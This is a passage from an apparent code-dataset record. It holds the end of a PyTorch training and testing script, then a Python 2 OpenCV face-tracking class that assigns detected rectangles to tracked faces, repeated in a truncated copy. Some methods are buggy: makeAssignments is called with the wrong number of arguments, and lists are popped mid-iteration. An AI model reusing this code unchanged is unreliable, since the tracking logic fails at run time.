set_up(args):\r\n set_gpu(args.gpu)\r\n ensure_path(args.save_path)\r\n torch.manual_seed(args.random_seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\r\n seed_all(args.random_seed)\r\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\r\n set_up(args)\r\n\r\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\r\n\r\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\r\n\r\n model = get_model(args)\r\n para = get_trainable_parameter_num(model)\r\n print('Model {} size:{}'.format(args.model, para))\r\n\r\n if CUDA:\r\n model = model.cuda()\r\n\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n def save_model(name):\r\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\r\n if os.path.exists(previous_model):\r\n os.remove(previous_model)\r\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))\r\n\r\n trlog = {}\r\n trlog['args'] = vars(args)\r\n trlog['train_loss'] = []\r\n trlog['val_loss'] = []\r\n trlog['train_acc'] = []\r\n trlog['val_acc'] = []\r\n trlog['max_acc'] = 0.0\r\n\r\n timer = Timer()\r\n\r\n for epoch in range(1, args.max_epoch + 1):\r\n\r\n loss_train, pred_train, act_train = train_one_epoch(\r\n data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\r\n\r\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)\r\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'\r\n .format(epoch, loss_train, acc_train, f1_train))\r\n\r\n loss_val, pred_val, act_val = predict(\r\n data_loader=val_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\r\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.\r\n format(epoch, loss_val, acc_val, f1_val))\r\n\r\n\r\n if acc_val > trlog['max_acc']:\r\n trlog['max_acc'] = acc_val\r\n save_model('max-acc')\r\n\r\n if args.save_model:\r\n # save model here for reproduce\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n torch.save(model.state_dict(), model_name_reproduce)\r\n\r\n trlog['train_loss'].append(loss_train)\r\n trlog['train_acc'].append(acc_train)\r\n trlog['val_loss'].append(loss_val)\r\n trlog['val_acc'].append(acc_val)\r\n\r\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),\r\n subject, fold))\r\n save_name_ = 'trlog' + save_name\r\n ensure_path(osp.join(args.save_path, 'log_train'))\r\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\r\n\r\n return trlog['max_acc']\r\n\r\n\r\ndef test(args, data, label, reproduce, subject, fold):\r\n seed_all(args.random_seed)\r\n set_up(args)\r\n\r\n test_loader = get_dataloader(data, label, args.batch_size, False)\r\n\r\n model = get_model(args)\r\n if CUDA:\r\n model = model.cuda()\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n if reproduce:\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n model.load_state_dict(torch.load(model_name_reproduce))\r\n else:\r\n model.load_state_dict(torch.load(args.load_path))\r\n loss, pred, act = predict(\r\n data_loader=test_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\r\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\r\n return acc, pred, act\r\n\r\n\r\n",
"step-ids": [
2,
4,
6,
7,
8
]
}
|
[
2,
4,
6,
7,
8
] |
import math
import datetime as dt
import cv2
import os
from face import Face
class Video:
def __init__(self, vidSource, variableList=[], showWindow=True):
self.vidcap = cv2.VideoCapture(vidSource)
self.cascade = cv2.CascadeClassifier("face_cascade2.xml")
self.visibleFaceList = [] # contains all Face objects within the frame
self.notVisibleFaceList = []
self.inactiveFaceList = []
self.totalFaceCount = 0 # number of total faces seen so far
self.frameCount = 0 # counter to determine when to detect
self.cleanThresh = 0
# PERHAPS SUBCLASS?
self.frameImage = None # this is whatever kind of image returned by openCV
self.showWindow = showWindow
if self.showWindow:
cv2.namedWindow("show")
#####TWEAKABLE VARIABLES#####
if variableList == []:
# Always between 0 and 1
self.velocityWeight = 0
self.scoreWeight = 1
self.minRemovalScore = 0.1
# Maybe larger than one
self.radiusSize = 0.5
# Probably always larger than one
self.timeOut = 15
self.frameGap = 0
self.cleanThresh = 5
self.usingTime = True
# add a catch statement for if variable list isn't of length 6
else:
# Always between 0 and 1
self.velocityWeight = variableList[0]
self.scoreWeight = variableList[1]
self.minRemovalScore = variableList[2]
# Maybe larger than one
self.radiusSize = variableList[3]
# Probably always larger than one
self.timeOut = variableList[4]
self.frameGap = variableList[5]
self.cleanThresh = variableList[6]
self.usingTime = variableList[7]
def getFaces(self):
return self.visibleFaceList
def getCurrentFrame(self):
return self.frameImage
def pruneFaceList(self):
# for i in range(len(self.notVisibleFaceList)):
i = 0
while i < len(self.notVisibleFaceList):
pos = self.notVisibleFaceList[i].getPosition()
timeSinceDetection = dt.datetime.now()-pos[2]
if timeSinceDetection.total_seconds() > self.timeOut:
print timeSinceDetection.total_seconds()
print self.notVisibleFaceList[i].id
self.inactiveFaceList.append(self.notVisibleFaceList.pop(i))
i += 1
def addNewFace(self, location):
fc = Face()
fc.id = self.totalFaceCount
self.totalFaceCount += 1
fc.setPosition(location)
self.visibleFaceList.append(fc)
def listHelper(self, listChoice, rects):
megaList = []
for i in range(len(rects)):
tempList = []
for j in range(len(listChoice)):
tempList.append(self.scoreForBeingHere(listChoice[j],rects[i]))
# if there are issues, it's with copying
megaList.append(list(tempList))
return megaList
def dualListHelper(self, list1, list2, rects):
megaList = []
breakPoint = 0
for i in range(len(list1)):
tempList = []
for j in range(len(rects)):
tempList.append(self.scoreForBeingHere(list1[i],rects[j]))
breakPoint = i
megaList.append(list(tempList))
for i in range(len(list2)):
tempList = []
for j in range(len(rects)):
tempList.append(self.scoreForBeingHere(list2[i],rects[j]))
# if there are issues, it's with copying
megaList.append(list(tempList))
return megaList, breakPoint
def analyzeFrame(self, rects):
self.pruneFaceList()
#Case 1
# if len(rects)>len(self.visibleFaceList):
# print "case1"
if len(self.visibleFaceList)>0:
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = [-1]*(len(self.visibleFaceList)+len(self.notVisibleFaceList))
totalAssigned=0
visibleFaces = len(self.visibleFaceList)
totalFaces = len(self.visibleFaceList)+len(self.notVisibleFaceList)
indices = []
while totalAssigned < len(rects):
# print "WHILE"
# print len(rects)
index = 0
highest = 0
highFaceIndex = 0
for i in range(len(megaList)):
if assignmentList[i] == -1:
currentVal = max(megaList[i])
# print currentVal
currentIndex = megaList[i].index(currentVal)
# print currentIndex not in assignmentList
if currentVal > highest and currentIndex not in assignmentList and currentVal > self.minRemovalScore:
highest = currentVal
index = currentIndex
highFaceIndex = i
if highest != 0:
if highFaceIndex > breakPoint:
face = self.notVisibleFaceList.pop(highFaceIndex-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList[highFaceIndex] = currentIndex
indices.append(highFaceIndex)
totalAssigned +=1
else:
print "HIGHEST = 0"
for j in range(len(rects)):
# print rects
if j not in assignmentList:
# print "here"
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(j)
indices.append(len(assignmentList)-1)
totalAssigned += 1
# print assignmentList
self.makeAssignments(assignmentList,rects, indices, visibleFaces)
for i in range(visibleFaces-1):
if assignmentList[i] == -1:
face = self.visibleFaceList.pop(i)
self.notVisibleFaceList.append(face)
else:
for i in range(len(rects)):
self.addNewFace(rects[i])
def analyzeFrame2(self, rects):
self.pruneFaceList()
#Case 1
if len(rects)>len(self.visibleFaceList):
# print "case1"
if len(self.visibleFaceList)>0:
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
if highest > self.minRemovalScore:
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
else:
for i in range(len(rects)):
self.addNewFace(rects[i])
#Case 2
elif len(rects)==len(self.visibleFaceList):
# print "case2"
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
# print "list"
# print megaList
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
if highest > self.minRemovalScore:
# print "problem case?"
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
#Case 3 (less rects than faces)
else:
# print "case3"
megaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)
assignmentList = []
probabilityList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
probabilityList.append(highest)
if highest > self.minRemovalScore:
if i > breakPoint:
face = self.notVisibleFaceList.pop(i-breakPoint-1)
self.visibleFaceList.append(face)
index = len(self.visibleFaceList)-1
assignmentList.append(index)
else:
face = Face()
face.id = self.totalFaceCount
self.totalFaceCount += 1
self.visibleFaceList.append(face)
assignmentList.append(len(self.visibleFaceList)-1)
self.makeAssignments(assignmentList, rects)
k = 0
while k < breakPoint:
if k not in assignmentList:
face = self.visibleFaceList.pop(k)
self.notVisibleFaceList.append(face)
k+=1
l = 0
# while len(assignmentList) > len(rects):
def analyzeFrame3(self,rects):
self.pruneFaceList()
if len(rects)>len(self.visibleFaceList):
if len(self.visibleFaceList)>0:
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
# ensure that face hasn't been used already
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
self.makeAssignments(assignmentList, rects)
notList = self.listHelper(self.notVisibleFaceList,rects)
if notList != []:
for i in range(len(rects)):
index = -1
highest = 0
for j in range(len(self.notVisibleFaceList)):
if j not in assignmentList:
# print notList
if notList[i][j] > highest:
index = j
highest = notList[j][i]
if index != -1:
if notList[index][i] > self.minRemovalScore:
face = self.notVisibleFaceList.pop(index)
face.setPosition(rects[i])
self.visibleFaceList.append(face)
else:
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
else:
for i in range(len(rects)):
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
else:
for i in range(len(rects)):
fc = Face()
fc.id = self.totalFaceCount
# print fc.id
self.totalFaceCount += 1
fc.setPosition(rects[i])
self.visibleFaceList.append(fc)
elif len(rects)==len(self.visibleFaceList):
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
self.makeAssignments(assignmentList, rects)
else:
# less rects than faces
megaList = self.listHelper(self.visibleFaceList,rects)
# print megaList
assignmentList = []
probabilityList = []
for i in range(len(megaList)):
highest = 0
index = 0
for j in range(len(megaList[i])):
if megaList[i][j] >= highest and j not in assignmentList:
index = j
highest = megaList[i][j]
assignmentList.append(index)
probabilityList.append(highest)
if len(probabilityList)!=0:
lowIndex = probabilityList.index(min(probabilityList))
self.notVisibleFaceList.append(self.visibleFaceList.pop(lowIndex))
assignmentList.pop(lowIndex)
self.makeAssignments(assignmentList, rects)
def makeAssignments(self, assignmentList, rects, indices, visibleFaces):
# print "assign"
# print assignmentList
# print rects
counter = 0
# print len(self.visibleFaceList)
for i in range(len(assignmentList)):
if rects != []:
if assignmentList[i] != -1:
if i < visibleFaces:
self.visibleFaceList[i].setPosition(rects[assignmentList[i]])
else:
print "HERE"
print assignmentList
print rects
print assignmentList[indices[counter]]
print rects[assignmentList[indices[counter]]]
self.visibleFaceList[counter+visibleFaces].setPosition(rects[assignmentList[indices[counter]]])
counter += 1
def scoreForBeingHere(self, face1, rect):
"""compares face and rect to sees what the chances are that they are the same
returns float between 0 and 1"""
time = dt.datetime.now()
recentPosition = face1.getPosition()
if not (recentPosition==[]):
deltaTime = (time - recentPosition[2]).total_seconds()
velocity = face1.getVelocity()
area = math.pow(face1.getArea(),0.5)
if self.usingTime:
radius = deltaTime*area*self.radiusSize
else:
radius = area*self.radiusSize
middleOfRect = ((rect[2]+rect[0])/2,(rect[3]+rect[1])/2)
middleOfFace = ((recentPosition[1][0]+recentPosition[0][0])/2,(recentPosition[1][1]+recentPosition[0][1])/2)
if velocity != 0:
middleOfFace = (middleOfFace[0] + velocity[0]/velocity[2]*deltaTime*self.velocityWeight, middleOfFace[1] + velocity[1]/velocity[2]*deltaTime*self.velocityWeight)
diffMiddles = math.pow(math.pow(middleOfFace[0]-middleOfRect[0], 2) + math.pow(middleOfFace[1]-middleOfRect[1], 2), 0.5)
# asymptote equation such that after the difference in middles is more than 1 radius away,
# prob will be down to 0.25 but after that it slowly goes to 0 never quite reaching it
x = math.pow(diffMiddles/radius,3)
# decays with increase in time
if self.usingTime:
score = self.scoreWeight/(deltaTime*(3*x+1))
else:
score = self.scoreWeight/((3*x+1))
return score
else:
return 0
def readFrame(self):
"""read frame from openCV info"""
success, self.frameImage = self.vidcap.read()
return success, self.frameImage
def detectAll(self):
"""Run face detection algorithm on the whole picture and make adjustments
to the faces based on where the are and where they should be"""
rects = self.cascade.detectMultiScale(self.frameImage, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))
return rects
# # won't really ever use
# def estimateAll(self):
# """Step forward one frame, update all (visible?) faces based on estimation
# from velocities; don't run face detection algorithm
# Should be run every frame except where detectAll() is run."""
# pass
# # for face in self.visibleFaceList[]:
# # face.estimateNextPosition()
def findFaces(self):
"""detects all faces with the frame then analyzes the frame to determine
which face belongs to which face object"""
rects = self.detectAll()
if len(rects)==0:
rects = []
else:
rects[:, 2:] += rects[:, :2]
self.analyzeFrame(rects)
def display(self):
""" Displays current frame with rectangles and boxes"""
# print len(self.visibleFaceList)
# print "not visible: "
# for face in self.notVisibleFaceList:
# print face.id
# print "visibel: "
for i in range(len(self.visibleFaceList)):
# print self.visibleFaceList[i].id
self.showRectangle(self.visibleFaceList[i].getPosition(),self.visibleFaceList[i].id)
cv2.imshow("show", self.frameImage)
def clean(self):
i = 0
while i < len(self.notVisibleFaceList):
if len(self.notVisibleFaceList[i].prevPositions) < self.cleanThresh:
self.notVisibleFaceList.pop(i)
self.totalFaceCount -= 1
i += 1
def showRectangle(self, pos, IDnum):
cv2.rectangle(self.frameImage, pos[0], pos[1], (255,0,0), 2)
cv2.putText(self.frameImage, str(IDnum), pos[0], cv2.FONT_HERSHEY_SIMPLEX, 2, [0,255,0], 3)
def endWindow(self):
"""stops using webcam (or whatever source is) and removes display window"""
self.vidcap.release()
cv2.destroyWindow("show")
|
normal
|
{
"blob_id": "7af0566161c909457d40d3856434f1fb1e800aab",
"index": 1445,
"step-1": "import math\nimport datetime as dt\nimport cv2\nimport os\nfrom face import Face\n\nclass Video:\n\tdef __init__(self, vidSource, variableList=[], showWindow=True):\n\t\tself.vidcap = cv2.VideoCapture(vidSource)\n\t\tself.cascade = cv2.CascadeClassifier(\"face_cascade2.xml\")\n\t\tself.visibleFaceList = []\t\t# contains all Face objects within the frame\n\t\tself.notVisibleFaceList = []\n\t\tself.inactiveFaceList = []\n\t\tself.totalFaceCount = 0\t\t # number of total faces seen so far\n\t\tself.frameCount = 0\t\t\t # counter to determine when to detect\n\t\tself.cleanThresh = 0\n\t\t# PERHAPS SUBCLASS?\n\t\tself.frameImage = None # this is whatever kind of image returned by openCV\n\t\tself.showWindow = showWindow\n\n\t\tif self.showWindow:\n\t\t\tcv2.namedWindow(\"show\")\n\t\t#####TWEAKABLE VARIABLES#####\n\t\tif variableList == []:\n\t\t\t# Always between 0 and 1\n\t\t\tself.velocityWeight = 0\n\t\t\tself.scoreWeight = 1\n\t\t\tself.minRemovalScore = 0.1\n\t\t\t# Maybe larger than one\n\t\t\tself.radiusSize = 0.5\n\t\t\t# Probably always larger than one\n\t\t\tself.timeOut = 15\n\t\t\tself.frameGap = 0\n\t\t\tself.cleanThresh = 5\n\t\t\tself.usingTime = True\n\t\t# add a catch statement for if variable list isn't of length 6\n\t\telse:\n\t\t\t# Always between 0 and 1\n\t\t\tself.velocityWeight = variableList[0]\n\t\t\tself.scoreWeight = variableList[1]\n\t\t\tself.minRemovalScore = variableList[2]\n\t\t\t# Maybe larger than one\n\t\t\tself.radiusSize = variableList[3]\n\t\t\t# Probably always larger than one\n\t\t\tself.timeOut = variableList[4]\n\t\t\tself.frameGap = variableList[5]\n\t\t\tself.cleanThresh = variableList[6]\n\t\t\tself.usingTime = variableList[7]\n\n\n\tdef getFaces(self):\n\t\treturn self.visibleFaceList\n\n\tdef getCurrentFrame(self):\n\t\treturn self.frameImage\n\n\tdef pruneFaceList(self):\n\t\t# for i in range(len(self.notVisibleFaceList)):\n\t\ti = 0\n\t\twhile i < len(self.notVisibleFaceList):\n\t\t\tpos = self.notVisibleFaceList[i].getPosition()\n\t\t\ttimeSinceDetection = dt.datetime.now()-pos[2]\n\t\t\tif timeSinceDetection.total_seconds() > self.timeOut:\n\t\t\t\tprint timeSinceDetection.total_seconds()\n\t\t\t\tprint self.notVisibleFaceList[i].id\n\t\t\t\tself.inactiveFaceList.append(self.notVisibleFaceList.pop(i))\n\t\t\ti += 1\n\n\tdef addNewFace(self, location):\n\t\tfc = Face()\n\t\tfc.id = self.totalFaceCount\n\t\tself.totalFaceCount += 1\n\t\tfc.setPosition(location)\n\t\tself.visibleFaceList.append(fc)\n\n\tdef listHelper(self, listChoice, rects):\n\t\tmegaList = []\n\t\tfor i in range(len(rects)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(listChoice)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(listChoice[j],rects[i]))\n\t\t\t# if there are issues, it's with copying\n\t\t\tmegaList.append(list(tempList))\n\t\treturn megaList\n\n\tdef dualListHelper(self, list1, list2, rects):\n\t\tmegaList = []\n\t\tbreakPoint = 0\n\t\tfor i in range(len(list1)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(rects)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(list1[i],rects[j]))\n\t\t\tbreakPoint = i\n\t\t\tmegaList.append(list(tempList))\n\t\tfor i in range(len(list2)):\n\t\t\ttempList = []\n\t\t\tfor j in range(len(rects)):\n\t\t\t\ttempList.append(self.scoreForBeingHere(list2[i],rects[j]))\n\t\t\t# if there are issues, it's with copying\n\t\t\tmegaList.append(list(tempList))\n\n\t\treturn megaList, breakPoint\n\n\tdef analyzeFrame(self, rects):\n\t\tself.pruneFaceList()\n\t\t#Case 1\n\t\t# if len(rects)>len(self.visibleFaceList):\n\t\t\t# print \"case1\"\n\t\tif len(self.visibleFaceList)>0:\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = [-1]*(len(self.visibleFaceList)+len(self.notVisibleFaceList))\n\t\t\ttotalAssigned=0\n\t\t\tvisibleFaces = len(self.visibleFaceList)\n\t\t\ttotalFaces = len(self.visibleFaceList)+len(self.notVisibleFaceList)\n\t\t\tindices = []\n\n\t\t\twhile totalAssigned < len(rects):\n\t\t\t\t# print \"WHILE\"\n\t\t\t\t# print len(rects)\n\t\t\t\tindex = 0\n\t\t\t\thighest = 0\n\t\t\t\thighFaceIndex = 0\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\tif assignmentList[i] == -1:\n\t\t\t\t\t\tcurrentVal = max(megaList[i])\n\t\t\t\t\t\t# print currentVal\n\t\t\t\t\t\tcurrentIndex = megaList[i].index(currentVal)\n\t\t\t\t\t\t# print currentIndex not in assignmentList\n\t\t\t\t\t\tif currentVal > highest and currentIndex not in assignmentList and currentVal > self.minRemovalScore:\n\t\t\t\t\t\t\thighest = currentVal\n\t\t\t\t\t\t\tindex = currentIndex\n\t\t\t\t\t\t\thighFaceIndex = i\n\t\t\t\tif highest != 0:\n\t\t\t\t\tif highFaceIndex > breakPoint:\n\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(highFaceIndex-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList[highFaceIndex] = currentIndex\n\t\t\t\t\tindices.append(highFaceIndex)\n\t\t\t\t\ttotalAssigned +=1\n\t\t\t\telse:\n\t\t\t\t\tprint \"HIGHEST = 0\"\n\t\t\t\t\tfor j in range(len(rects)):\n\t\t\t\t\t\t# print rects\n\t\t\t\t\t\tif j not in assignmentList:\n\t\t\t\t\t\t\t# print \"here\"\n\t\t\t\t\t\t\tface = Face()\n\t\t\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\t\tassignmentList.append(j)\n\t\t\t\t\t\t\tindices.append(len(assignmentList)-1)\n\t\t\t\t\t\t\ttotalAssigned += 1\n\t\t\t# print assignmentList\n\t\t\tself.makeAssignments(assignmentList,rects, indices, visibleFaces)\n\t\t\tfor i in range(visibleFaces-1):\n\t\t\t\tif assignmentList[i] == -1:\n\t\t\t\t\tface = self.visibleFaceList.pop(i)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\telse:\n\t\t\tfor i in range(len(rects)):\n\t\t\t\tself.addNewFace(rects[i])\n\n\tdef analyzeFrame2(self, rects):\n\t\tself.pruneFaceList()\n\t\t#Case 1\n\t\tif len(rects)>len(self.visibleFaceList):\n\t\t\t# print \"case1\"\n\t\t\tif len(self.visibleFaceList)>0:\n\t\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\t\tassignmentList = []\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\thighest = 0\n\t\t\t\t\tindex = 0\n\t\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\t\tif highest > self.minRemovalScore:\n\t\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\t\tassignmentList.append(index)\n\t\t\t\t\telse:\n\t\t\t\t\t\tface = Face()\n\t\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\t\tk = 0\n\t\t\t\twhile k < breakPoint:\n\t\t\t\t\tif k not in assignmentList:\n\t\t\t\t\t\tface = self.visibleFaceList.pop(k)\n\t\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\t\tk+=1\n\n\t\t\telse:\n\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\tself.addNewFace(rects[i])\n\n\t\t#Case 2\n\t\telif len(rects)==len(self.visibleFaceList):\n\t\t\t# print \"case2\"\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = []\n\t\t\t# print \"list\"\n\t\t\t# print megaList\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tif highest > self.minRemovalScore:\n\t\t\t\t\t# print \"problem case?\"\n\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList.append(index)\n\t\t\t\telse:\n\t\t\t\t\tface = Face()\n\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\tk = 0\n\t\t\twhile k < breakPoint:\n\t\t\t\tif k not in assignmentList:\n\t\t\t\t\tface = self.visibleFaceList.pop(k)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\tk+=1\n\n\t\t#Case 3 (less rects than faces)\n\t\telse:\n\t\t\t# print \"case3\"\n\t\t\tmegaList, breakPoint = self.dualListHelper(self.visibleFaceList, self.notVisibleFaceList, rects)\n\t\t\tassignmentList = []\n\t\t\tprobabilityList = []\n\t\t\tfor i in range(len(megaList)):\n\t\t\t\thighest = 0\n\t\t\t\tindex = 0\n\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\tindex = j\n\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\tprobabilityList.append(highest)\n\t\t\t\tif highest > self.minRemovalScore:\n\t\t\t\t\tif i > breakPoint:\n\t\t\t\t\t\tface = self.notVisibleFaceList.pop(i-breakPoint-1)\n\t\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\t\tindex = len(self.visibleFaceList)-1\n\t\t\t\t\tassignmentList.append(index)\n\t\t\t\telse:\n\t\t\t\t\tface = Face()\n\t\t\t\t\tface.id = self.totalFaceCount\n\t\t\t\t\tself.totalFaceCount += 1\n\t\t\t\t\tself.visibleFaceList.append(face)\n\t\t\t\t\tassignmentList.append(len(self.visibleFaceList)-1)\n\n\t\t\tself.makeAssignments(assignmentList, rects)\n\t\t\tk = 0\n\t\t\twhile k < breakPoint:\n\t\t\t\tif k not in assignmentList:\n\t\t\t\t\tface = self.visibleFaceList.pop(k)\n\t\t\t\t\tself.notVisibleFaceList.append(face)\n\t\t\t\tk+=1\n\t\t\tl = 0\n\t\t\t# while len(assignmentList) > len(rects):\n\n\t\t\t\n\n\tdef analyzeFrame3(self,rects):\n\t\tself.pruneFaceList()\n\t\tif len(rects)>len(self.visibleFaceList):\n\t\t\tif len(self.visibleFaceList)>0:\n\t\t\t\tmegaList = self.listHelper(self.visibleFaceList,rects)\n\t\t\t\t# print megaList\n\t\t\t\tassignmentList = []\n\t\t\t\tfor i in range(len(megaList)):\n\t\t\t\t\thighest = 0\n\t\t\t\t\tindex = 0\n\t\t\t\t\tfor j in range(len(megaList[i])):\n\t\t\t\t\t\t# ensure that face hasn't been used already\n\t\t\t\t\t\tif megaList[i][j] >= highest and j not in assignmentList:\n\t\t\t\t\t\t\tindex = j\n\t\t\t\t\t\t\thighest = megaList[i][j]\n\t\t\t\t\tassignmentList.append(index)\n\n\t\t\t\tself.makeAssignments(assignmentList, rects)\n\n\t\t\t\tnotList = self.listHelper(self.notVisibleFaceList,rects)\n\n\t\t\t\tif notList != []:\n\t\t\t\t\tfor i in range(len(rects)):\n\t\t\t\t\t\tindex = -1\n\t\t\t\t\t\thighest = 0\n\t\t\t\t\t\tfor j in range(len(self.notVisibleFaceList)):\n\t\t\t\t\t\t\tif j not 